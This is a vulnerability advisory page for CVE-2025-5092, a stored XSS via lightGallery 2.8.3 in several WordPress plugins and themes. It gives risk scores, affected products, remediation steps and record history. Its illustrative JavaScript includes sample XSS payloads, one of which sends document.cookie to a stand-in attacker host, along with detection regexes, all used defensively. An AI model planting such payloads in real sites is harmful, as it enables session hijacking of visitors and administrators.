Description
Multiple plugins and/or themes for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled lightGallery library (<= 2.8.3) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-11-20
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross-Site Scripting that can execute injected scripts when users view affected pages
Action: Immediate Patch
AI Analysis

Impact

The vulnerability arises from the bundled lightGallery JavaScript library (version 2.8.3 or earlier) used by several WordPress plugins and themes. Insufficient sanitization of user-supplied attributes allows an attacker who can authenticate as a Contributor or higher to store arbitrary HTML or JavaScript in the gallery or image attributes that the library consumes (caption markup, for example). The Wordfence title classifies the issue as DOM-based stored XSS: the payload is not rendered by a server-side template but read from the page by lightGallery's client-side code and written into the DOM without escaping, so escaping applied to the post body on the server does not by itself prevent it. When an affected page is viewed, the injected script runs in the context of the site, enabling content theft, session hijacking, or site defacement against any visitor, including logged-in administrators.
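The pattern described above, as an added example that is not code from lightGallery or from any of the listed plugins: a gallery script takes a caption attribute from markup a Contributor controls and concatenates it into HTML that is later assigned to innerHTML. The attribute name, the CSS class, the item records and the triage regexes are constructed for illustration; the hardened variant shows the output escaping the advisory says was missing, and the scanner supports the "sanitize stored gallery data" step from the recommended actions.

```javascript
// Added example (not code from lightGallery or from any of the listed
// plugins). It models the CWE-79 pattern in the advisory: a gallery script
// takes a caption attribute from markup a Contributor controls and writes it
// into the page as HTML. The attribute name, the CSS class and the item
// records below are constructed for illustration.

// Constructed sample of gallery items as a plugin might persist them.
// Items 1 and 2 carry stored payloads; item 0 is benign rich text.
const STORED_ITEMS = [
  { src: "/uploads/beach.jpg", caption: "Beach at <b>sunset</b>" },
  { src: "/uploads/x.jpg",
    caption: "<img src=x onerror=\"fetch('https://attacker.invalid/?c=' + document.cookie)\">" },
  { src: "/uploads/y.jpg",
    caption: "<a href=\"javascript:alert(document.domain)\">details</a>" },
];

// Vulnerable rendering: the stored string is concatenated into markup that
// the gallery later assigns to element.innerHTML. Any tag or event handler
// in the attribute becomes live DOM in the viewer's session.
function renderCaptionVulnerable(item) {
  return `<div class="lg-sub-html">${item.caption}</div>`;
}

// Escape the characters that carry meaning in HTML text and attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened rendering: treat the caption as text. This is the output escaping
// the advisory says was missing. A plugin that needs rich captions should
// instead pass the value through an allowlist sanitizer (wp_kses_post() on
// the server, or a client-side sanitizer) before it reaches innerHTML.
function renderCaptionSafe(item) {
  return `<div class="lg-sub-html">${escapeHtml(item.caption)}</div>`;
}

// Triage helper for the "delete or sanitize stored gallery data" step:
// flag stored values containing script tags, inline event handlers or
// javascript:/data:/vbscript: URLs. Heuristic regexes, not an HTML parser,
// so treat hits as leads for manual review rather than as proof.
const SUSPICIOUS = [
  /<\s*script\b/i,
  /\bon[a-z]+\s*=/i,
  /(?:href|src|action)\s*=\s*["']?\s*(?:javascript|data|vbscript):/i,
];

function findSuspiciousItems(items) {
  const flagged = [];
  items.forEach((item, index) => {
    const hits = SUSPICIOUS.filter((re) => re.test(item.caption));
    if (hits.length > 0) flagged.push({ index, src: item.src, patterns: hits.map(String) });
  });
  return flagged;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const item of STORED_ITEMS) {
    console.log("vulnerable:", renderCaptionVulnerable(item));
    console.log("escaped:   ", renderCaptionSafe(item));
  }
  console.log("flagged for review:", findSuspiciousItems(STORED_ITEMS));
}
```

Run with `node` to see the two renderings side by side: the vulnerable path emits the `onerror` handler verbatim, the escaped path turns `<img` into `&lt;img`, and the scanner flags items 1 and 2 while leaving the benign `<b>` caption alone (it would be escaped, not executed).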

Affected Systems

Any WordPress site that has one of the following plugins or themes installed and is shipping lightGallery 2.8.3 or older:

  • OnePress
  • Gallery with thumbnail slider
  • LightGallery WP
  • Image Hover Effects Ultimate
  • TP WooCommerce Product Gallery
  • Ibtana – WordPress Website Builder
  • Royal Addons for Elementor – Addons and Templates Kit for Elementor
  • Portfolio, Gallery, Product Catalog – Grid KIT Portfolio

Precise version ranges are not listed; the issue exists in all releases that contain the vulnerable library.

Risk and Exploitability

The CVSS 3.1 base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) is Medium; the changed scope reflects that a payload stored by a low-privileged account executes in the browsers of other users, including administrators. The EPSS score below 1% is a low estimated probability of exploitation in the wild over the next 30 days, not evidence that exploitation is infeasible, and the vulnerability is not listed in the CISA KEV catalog; the SSVC assessment in the history below records Exploitation: none and Automatable: no. Exploitation requires an authenticated account with Contributor or higher privileges; once the payload is stored, it fires for every user who views the page containing it. A Content Security Policy that blocks inline scripts and event handlers would limit the impact, but most WordPress sites cannot deploy such a policy because core and many plugins rely on inline scripts.

Generated by OpenCVE AI on April 20, 2026 at 21:35 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade all affected themes and plugins to a release that no longer ships lightGallery 2.8.3 or older; since the advisory gives no per-plugin version ranges, confirm the bundled library version on disk after updating rather than relying on the plugin version alone.
  • If an update is not immediately available, review stored gallery and image data for attributes carrying HTML, inline event handlers, or javascript: URLs, delete or sanitize any such entries, then reset or recreate the gallery entries.
  • Restrict what Contributor-level accounts can do until a patch is deployed. Note that the default WordPress Contributor role cannot upload media (upload_files is granted to Authors and above), so the relevant controls are gallery and post editing capabilities and editorial review: content a Contributor saves is rendered for the Editor or Administrator who previews it, so a stored payload can fire against the reviewer before publication.



Advisories

No advisories yet.

History

Mon, 24 Nov 2025 20:00:00 +0000

Type: References (no values listed)

Mon, 24 Nov 2025 09:15:00 +0000

Type: First Time appeared
Values Added:
  • Famatehemes
  • Famatehemes onepress
  • Galaxyweblinks
  • Galaxyweblinks gallery With Thumbnail Slider
  • Lightgalleryteam
  • Lightgalleryteam lightgallery Wp
  • Tplugins
  • Tplugins tp Woocommerce Product Gallery
  • Vowelweb
  • Vowelweb ibtana
  • Wordpress
  • Wordpress wordpress
  • Wpkin
  • Wpkin image Hover Effects Ultimate
  • Wproyal
  • Wproyal royal Elementor Addons And Templates
  • Wpsofts
  • Wpsofts portfolio Gallery, Product Catalog - Grid Kit Portfolio

Type: Vendors & Products
Values Added:
  • Famatehemes
  • Famatehemes onepress
  • Galaxyweblinks
  • Galaxyweblinks gallery With Thumbnail Slider
  • Lightgalleryteam
  • Lightgalleryteam lightgallery Wp
  • Tplugins
  • Tplugins tp Woocommerce Product Gallery
  • Vowelweb
  • Vowelweb ibtana
  • Wordpress
  • Wordpress wordpress
  • Wpkin
  • Wpkin image Hover Effects Ultimate
  • Wproyal
  • Wproyal royal Elementor Addons And Templates
  • Wpsofts
  • Wpsofts portfolio Gallery, Product Catalog - Grid Kit Portfolio

Thu, 20 Nov 2025 16:15:00 +0000

Type: Metrics (ssvc)
Values Added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 20 Nov 2025 06:45:00 +0000

Type: Description
Values Added: Multiple plugins and/or themes for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled lightGallery library (<= 2.8.3) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Type: Title
Values Added: Multiple Plugins and Themes <= (Various Versions) - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via lightGallery JavaScript Library

Type: Weaknesses
Values Added: CWE-79

Type: References (no values listed)

Type: Metrics (cvssV3_1)
Values Added: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:14:57.172Z

Reserved: 2025-05-22T16:48:25.802Z

Link: CVE-2025-5092

Vulnrichment

Updated: 2025-11-20T15:43:09.730Z

NVD

Status : Deferred

Published: 2025-11-20T15:17:37.650

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-5092

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-20T21:45:18Z

Weaknesses